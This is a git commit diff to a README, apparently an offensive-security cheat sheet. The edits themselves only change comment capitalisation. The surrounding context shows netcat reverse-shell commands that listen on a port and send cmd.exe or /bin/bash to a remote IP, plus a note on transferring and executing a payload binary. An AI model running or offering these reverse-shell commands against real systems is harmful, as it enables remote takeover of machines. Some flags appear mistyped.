Update README.md

This commit is contained in:
Joe Totes
2022-08-03 19:14:49 -04:00
committed by GitHub
parent 6ad6d3d094
commit 32127f844a

View File

@@ -418,12 +418,10 @@ sudo nc lnvp {PORT}
```
<br />
# {IP ADDRESS}: IP Address of the client from step one (python server)
## NC Execute - Server [STEP 2]
```bash
# With Netcat installed
# With netcat installed
# Usage - Windows
nc.exe -e cmd.exe {IP ADDRESS} {PORT}
@@ -433,7 +431,7 @@ nc {IP ADDRESS} {PORT} e /bin/bash
# ===========================================
# Without Netcat installed
# Without netcat installed
# Usage - transfer payload via file transfer and execute binary